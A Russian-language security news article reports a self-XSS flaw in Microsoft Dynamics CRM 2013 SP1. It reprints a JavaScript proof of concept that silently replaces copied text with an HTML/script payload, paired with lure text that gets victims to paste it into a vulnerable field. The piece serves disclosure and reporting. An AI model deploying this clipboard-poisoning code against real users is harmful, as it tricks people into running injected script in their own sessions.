В Microsoft Dynamics CRM 2013 SP1 обнаружена XSS-уязвимость

image

Теги: уязвимость, Microsoft, XSS-атака

Злоумышленник может осуществить XSS-атаку, вынудив пользователя выполнить вредоносный код.

Специалисты компании High-Tech Bridge обнаружили XSS-уязвимость в Microsoft Dynamics CRM 2013 SP1. Проэксплуатировав ее, злоумышленник может выполнить произвольный скриптовый код в контексте уязвимого web-сайта.

Уязвимость существует из-за недостаточной обработки входных данных в сценарии “/biz/users/addusers/selectuserspage.aspx” после неудачной попытки отправить XML SOAP-запрос. Для успешной эксплуатации бреши злоумышленник должен заставить жертву вставить вредоносный HTML- и скриптовый код в поле “newUsers_ledit” и выполнить его.

Отметим, что для совершения атаки злоумышленник должен обладать навыками социального инжиниринга, чтобы вынудить пользователя вставить вредоносный код в вышеуказанное поле. Ожидается, что, несмотря на высокую сложность эксплуатации уязвимости, хакеры все равно воспользуются ею для осуществления атак против пользователей Microsoft Dynamics CRS.

Ниже представлен PoC-код уязвимости, который отобразит пользователю легитимный текст, но заменит содержимое его буфера обмена на вредоносный код:

<script>
// simple exploit to poison clipboard
function replaceBuffer() {
var selection = window.getSelection(),
eviltext = '1&lt;img src=x onerror=alert("ImmuniWeb") /&gt;',
copytext = eviltext,
newdiv = document.createElement('div');
newdiv.style.position = 'absolute';
newdiv.style.left = '-99999px';
document.body.appendChild(newdiv);
newdiv.innerHTML = copytext;
selection.selectAllChildren(newdiv);
window.setTimeout(function () {
document.body.removeChild(newdiv);
}, 100);
}
document.addEventListener('copy', replaceBuffer);
</script>
<div>In order to find hidden users just copy this string into the search window:<br>
HIDDEN USERS&&DISPLAY</div>

В своем браузере жертва увидит текст HIDDEN USERS&&DISPLAY, но в буфер обмена будет скопирован вредоносный пэйлоад 1<img src=x onerror=alert("ImmuniWeb")>.

После отображения данного текста злоумышленник должен вынудить пользователя вставить вредоносный код в поле “newUsers_ledit” на странице “/biz/users/addusers/selectuserspage.aspx”.

Отметим, что компания Microsoft не считает данную ошибку уязвимостью – критерии оценивания уязвимостей не расценивают self-XSS-атаки (атаки, в которых пользователь должен самостоятельно выполнить вредоносный пэйлоад) как отдельные бреши.

С детальным описанием уязвимости можно ознакомиться  здесь .

Telegram Подписывайтесь на канал "SecurityLab" в Telegram, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.